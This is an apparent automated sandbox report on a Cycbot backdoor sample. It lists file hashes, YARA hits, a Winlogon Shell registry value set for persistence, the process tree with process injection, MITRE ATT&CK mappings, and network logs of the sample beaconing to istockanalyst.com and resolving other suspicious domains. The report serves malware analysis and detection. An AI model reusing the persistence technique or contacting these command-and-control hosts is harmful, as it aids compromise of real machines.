cycbot | 2125a1e00be1bd129634cdd69d9540a4c49ae1864702547ada32ec70da42c95c

Resubmissions

14/01/2025, 12:41 UTC

250114-pwxp2azpdn 10

14/01/2025, 10:56 UTC

250114-m132hayjhj 10

Analysis

max time kernel
110s
max time network
94s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
14/01/2025, 12:41 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
Size

177KB
MD5

3be07720d75271452be60d7ea80d508a
SHA1

ce8685fbc1a0ef90eab3911b64e3cfebd60238c2
SHA256

2125a1e00be1bd129634cdd69d9540a4c49ae1864702547ada32ec70da42c95c
SHA512

375a01be852e44e3025b06f6cc58902fd12f465c028cdbe28e537218b27e00ce81fa6c038c13aae49632a1e3aea1229086dade40721f509c9f022794113af897
SSDEEP

3072:AWdbPR3RVFNvm8L8ds89HNnXbIygHVP3txJDnWUUXK6sAkqOjwPp1ipLitl9:XhPRH/vfL8dV9HNMygHVPrVWUUXK8kqt

Score

10^/10

cycbot backdoor discovery persistence rat upx

Malware Config

Signatures

Cycbot
Cycbot is a backdoor and trojan written in C++..
backdoor rat cycbot
Cycbot family
cycbot

Detects Cycbot payload 6 IoCs

Cycbot is a backdoor and trojan written in C++.

resource	yara_rule
behavioral2/memory/3688-15-0x0000000000400000-0x0000000000491000-memory.dmp	family_cycbot
behavioral2/memory/3092-16-0x0000000000400000-0x0000000000491000-memory.dmp	family_cycbot
behavioral2/memory/3092-17-0x0000000000400000-0x000000000048E000-memory.dmp	family_cycbot
behavioral2/memory/1992-128-0x0000000000400000-0x0000000000491000-memory.dmp	family_cycbot
behavioral2/memory/3092-129-0x0000000000400000-0x0000000000491000-memory.dmp	family_cycbot
behavioral2/memory/3092-283-0x0000000000400000-0x0000000000491000-memory.dmp	family_cycbot

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\E45B0\\73050.exe"	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

UPX packed file 9 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/3092-2-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3688-13-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3688-15-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3092-16-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3092-17-0x0000000000400000-0x000000000048E000-memory.dmp	upx
behavioral2/memory/1992-126-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/1992-128-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3092-129-0x0000000000400000-0x0000000000491000-memory.dmp	upx
behavioral2/memory/3092-283-0x0000000000400000-0x0000000000491000-memory.dmp	upx

System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Suspicious use of WriteProcessMemory 6 IoCs

description	pid	Process	procid_target
PID 3092 wrote to memory of 3688	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	82
PID 3092 wrote to memory of 3688	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	82
PID 3092 wrote to memory of 3688	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	82
PID 3092 wrote to memory of 1992	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	88
PID 3092 wrote to memory of 1992	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	88
PID 3092 wrote to memory of 1992	3092	JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe	88

C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe sh $MOZILLA/ %SIGILL% "SIGTERM|DESTROY|SIGKILL"
1⤵
- Modifies WinLogon for persistence
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3092
- C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
  C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe startC:\Program Files (x86)\LP\504E\11E.exe%C:\Program Files (x86)\LP\504E
  2⤵
  - System Location Discovery: System Language Discovery
  PID:3688
- C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
  C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe startC:\Program Files (x86)\B00C0\lvvm.exe%C:\Program Files (x86)\B00C0
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1992

Network

DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

172.210.232.199.in-addr.arpa

Remote address:

8.8.8.8:53

Request

172.210.232.199.in-addr.arpa

IN PTR

Response
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

0.159.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

0.159.190.20.in-addr.arpa

IN PTR

Response
DNS

167.173.78.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

167.173.78.104.in-addr.arpa

IN PTR

Response

167.173.78.104.in-addr.arpa

IN PTR

a104-78-173-167deploystaticakamaitechnologiescom
DNS

istockanalyst.com

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

8.8.8.8:53

Request

istockanalyst.com

IN A

Response

istockanalyst.com

IN A

104.21.32.1

istockanalyst.com

IN A

104.21.16.1

istockanalyst.com

IN A

104.21.80.1

istockanalyst.com

IN A

104.21.112.1

istockanalyst.com

IN A

104.21.96.1

istockanalyst.com

IN A

104.21.64.1

istockanalyst.com

IN A

104.21.48.1
GET

http://istockanalyst.com/12.jpg?sv=441&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUxZJVK%2B%2FbxWq1SfkIYWBo

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

104.21.32.1:80

Request

GET /12.jpg?sv=441&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUxZJVK%2B%2FbxWq1SfkIYWBo HTTP/1.0
Connection: close
Host: istockanalyst.com
Accept: */*
User-Agent: chrome/9.0

Response

HTTP/1.1 301 Moved Permanently

Date: Tue, 14 Jan 2025 12:41:44 GMT
Content-Type: text/html
Content-Length: 167
Connection: close
Cache-Control: max-age=3600
Expires: Tue, 14 Jan 2025 13:41:44 GMT
Location: https://istockanalyst.com/12.jpg?sv=441&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUxZJVK%2B%2FbxWq1SfkIYWBo
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jos1phta9CkQhgxQMgwuewqR9Dl5EpmdWmfh7VyD7i82L1ned0gE2Ib0RfT0O5KKqMcap1E9Sz5ZWoSUJ5KNYK%2FFz34qRnBUvYqepWsz7UbBkClErAAxR3I7PihQV0j5QrlG7g%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 901db3b7cee6cd95-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=26261&min_rtt=26261&rtt_var=13130&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=174&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
DNS

1.32.21.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.32.21.104.in-addr.arpa

IN PTR

Response
DNS

uq-x0n.hdmediastore.com

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

8.8.8.8:53

Request

uq-x0n.hdmediastore.com

IN A

Response
DNS

217.106.137.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.106.137.52.in-addr.arpa

IN PTR

Response
DNS

uzl08ez-.firoli-sys.com

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

8.8.8.8:53

Request

uzl08ez-.firoli-sys.com

IN A

Response
DNS

56.163.245.4.in-addr.arpa

Remote address:

8.8.8.8:53

Request

56.163.245.4.in-addr.arpa

IN PTR

Response
DNS

qhh4h6q2h-.wwwmediahosts.com

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

8.8.8.8:53

Request

qhh4h6q2h-.wwwmediahosts.com

IN A

Response
DNS

206.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.23.85.13.in-addr.arpa

IN PTR

Response
DNS

133.130.81.91.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.130.81.91.in-addr.arpa

IN PTR

Response
DNS

www.google.com

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

8.8.8.8:53

Request

www.google.com

IN A

Response

www.google.com

IN A

142.250.187.196
GET

http://www.google.com/

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

142.250.187.196:80

Request

GET / HTTP/1.0
Connection: close
Host: www.google.com
Accept: */*

Response

HTTP/1.0 302 Found

Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMS3mbwGIjBNeyJggsIXxdH5d33BLNtG8EMnuObRP5WhnF7kqwN0h5XKRZXwCzP2nUfQcpSneWUyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
x-hallmonitor-challenge: CgwIxbeZvAYQmO7SrwESBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-N4hlZ85AXjNSMvhbDzGO6Q' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 14 Jan 2025 12:42:45 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-WK_amUc7q-Q4Qc9ML6BK1gqXli7h2_mArYxEXj1GfL7BqSXxr2yZ4; expires=Sun, 13-Jul-2025 12:42:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
GET

http://www.google.com/

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

142.250.187.196:80

Request

GET / HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com

Response

HTTP/1.1 302 Found

Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMW3mbwGIjBHmgS-z48RzK4Iu7fgy-VhXBuOEtR-eJMSiSEMC_wqqQc_EaGJKa3pNpanzOPFhw8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
x-hallmonitor-challenge: CgwIxbeZvAYQ4JSi6AISBLXXsFM
Content-Type: text/html; charset=UTF-8
Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-AHHlztG-PWqScLIr470gqw' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
Date: Tue, 14 Jan 2025 12:42:45 GMT
Server: gws
Content-Length: 396
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: AEC=AZ6Zc-WIQNzM6jbc_lq3tQ8Oy3y8Ok3sv8JbQ0TTushvkU24Bh5o6mPlqQ; expires=Sun, 13-Jul-2025 12:42:45 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
Connection: close
DNS

196.187.250.142.in-addr.arpa

Remote address:

8.8.8.8:53

Request

196.187.250.142.in-addr.arpa

IN PTR

Response

196.187.250.142.in-addr.arpa

IN PTR

lhr25s33-in-f41e100net
GET

http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMW3mbwGIjBHmgS-z48RzK4Iu7fgy-VhXBuOEtR-eJMSiSEMC_wqqQc_EaGJKa3pNpanzOPFhw8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

Remote address:

142.250.187.196:80

Request

GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGMW3mbwGIjBHmgS-z48RzK4Iu7fgy-VhXBuOEtR-eJMSiSEMC_wqqQc_EaGJKa3pNpanzOPFhw8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Connection: close
Pragma: no-cache
Host: www.google.com

Response

HTTP/1.1 429 Too Many Requests

Date: Tue, 14 Jan 2025 12:42:45 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3075
X-XSS-Protection: 0
Connection: close
DNS

14.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

14.227.111.52.in-addr.arpa

IN PTR

Response

104.21.32.1:80

http://istockanalyst.com/12.jpg?sv=441&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUxZJVK%2B%2FbxWq1SfkIYWBo

http

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

404 B
1.3kB
5
5

HTTP Request

GET http://istockanalyst.com/12.jpg?sv=441&tq=gJ4WK%2FSUh5TBhRMw9YLJmMSTUivqg4aUxZJVK%2B%2FbxWq1SfkIYWBo

HTTP Response

301
127.0.0.1:63273
142.250.187.196:80

http://www.google.com/

http

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

302 B
1.5kB
5
5

HTTP Request

GET http://www.google.com/

HTTP Response

302
142.250.187.196:80

http://www.google.com/

http

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

307 B
1.5kB
5
5

HTTP Request

GET http://www.google.com/

HTTP Response

302
127.0.0.1:63273

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
127.0.0.1:63273

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe
142.250.187.196:80

http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMW3mbwGIjBHmgS-z48RzK4Iu7fgy-VhXBuOEtR-eJMSiSEMC_wqqQc_EaGJKa3pNpanzOPFhw8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

http

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

526 B
3.7kB
6
7

HTTP Request

GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMW3mbwGIjBHmgS-z48RzK4Iu7fgy-VhXBuOEtR-eJMSiSEMC_wqqQc_EaGJKa3pNpanzOPFhw8yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

HTTP Response

429
127.0.0.1:63273
127.0.0.1:63273

8.8.8.8:53

209.205.72.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

209.205.72.20.in-addr.arpa
8.8.8.8:53

172.210.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.210.232.199.in-addr.arpa
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

0.159.190.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

0.159.190.20.in-addr.arpa
8.8.8.8:53

167.173.78.104.in-addr.arpa

dns

73 B
139 B
1
1

DNS Request

167.173.78.104.in-addr.arpa
8.8.8.8:53

istockanalyst.com

dns

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

63 B
175 B
1
1

DNS Request

istockanalyst.com

DNS Response

104.21.32.1

104.21.16.1

104.21.80.1

104.21.112.1

104.21.96.1

104.21.64.1

104.21.48.1
8.8.8.8:53

1.32.21.104.in-addr.arpa

dns

70 B
132 B
1
1

DNS Request

1.32.21.104.in-addr.arpa
224.0.0.251:5353

168 B
3
8.8.8.8:53

uq-x0n.hdmediastore.com

dns

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

69 B
142 B
1
1

DNS Request

uq-x0n.hdmediastore.com
8.8.8.8:53

217.106.137.52.in-addr.arpa

dns

73 B
147 B
1
1

DNS Request

217.106.137.52.in-addr.arpa
8.8.8.8:53

uzl08ez-.firoli-sys.com

dns

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

69 B
142 B
1
1

DNS Request

uzl08ez-.firoli-sys.com
8.8.8.8:53

56.163.245.4.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

56.163.245.4.in-addr.arpa
8.8.8.8:53

qhh4h6q2h-.wwwmediahosts.com

dns

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

74 B
147 B
1
1

DNS Request

qhh4h6q2h-.wwwmediahosts.com
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

133.130.81.91.in-addr.arpa

dns

72 B
147 B
1
1

DNS Request

133.130.81.91.in-addr.arpa
8.8.8.8:53

www.google.com

dns

JaffaCakes118_3be07720d75271452be60d7ea80d508a.exe

60 B
76 B
1
1

DNS Request

www.google.com

DNS Response

142.250.187.196
8.8.8.8:53

196.187.250.142.in-addr.arpa

dns

74 B
112 B
1
1

DNS Request

196.187.250.142.in-addr.arpa
8.8.8.8:53

14.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

14.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\E45B0\00C0.45B

Filesize
996B

MD5
7b122234e9d7a52e896fab59a8410626

SHA1
e98229fc7b8042d5067a7f4a982fa1570c0c7797

SHA256
066610aa814590108e0fef8295ae8cdf59caa251947350952cc7baa816f8763e

SHA512
395326dc42e1bca49a7ad60a21a2b125c081a6268b6af0358dccf96ca588ad6f0c3b151b1336847bd335ba36e484ad8fe49f9ebd2dab96b1030a698d97a48770

Download Submit
C:\Users\Admin\AppData\Roaming\E45B0\00C0.45B

Filesize
600B

MD5
724710e6c5de80fd98e6f21803fb7684

SHA1
aa4ac8eaeebc87ac51f9ab536f2b64639ce529b6

SHA256
258c20078a9a7addd26c2e9398bcbe250e8a156a635d8a245859cad201cbdf37

SHA512
122f1819673aadbc678de5872c349becc7154e4af6094cb6e87ba461b69ffac296a684026cfd35c1e3b3372ef713ba88590ee822ca32b97d67d6158c0e11956b

Download Submit
C:\Users\Admin\AppData\Roaming\E45B0\00C0.45B

Filesize
1KB

MD5
9923981adf7c829dafd0f736218a0f4a

SHA1
24b9bafb774f049c1b53bb29473ca2aa7e09923a

SHA256
6f5d1e8c7395c5cf3d24f4f53428443c0a4a0271e96e30986688ebffe8805bf0

SHA512
41204d272b54a4dddd435e4ff7efcdb89bbbe97a990a4e11b882cc7042237e263c5372141e9aefc587ab9ea96859e5bfb9316633e8c517bc194cda730766d042

Download Submit
memory/1992-128-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/1992-126-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3092-17-0x0000000000400000-0x000000000048E000-memory.dmp

Filesize
568KB

Download
memory/3092-1-0x0000000000400000-0x000000000048E000-memory.dmp

Filesize
568KB

Download
memory/3092-16-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3092-129-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3092-2-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3092-283-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3688-15-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3688-13-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download
memory/3688-12-0x0000000000400000-0x0000000000491000-memory.dmp

Filesize
580KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.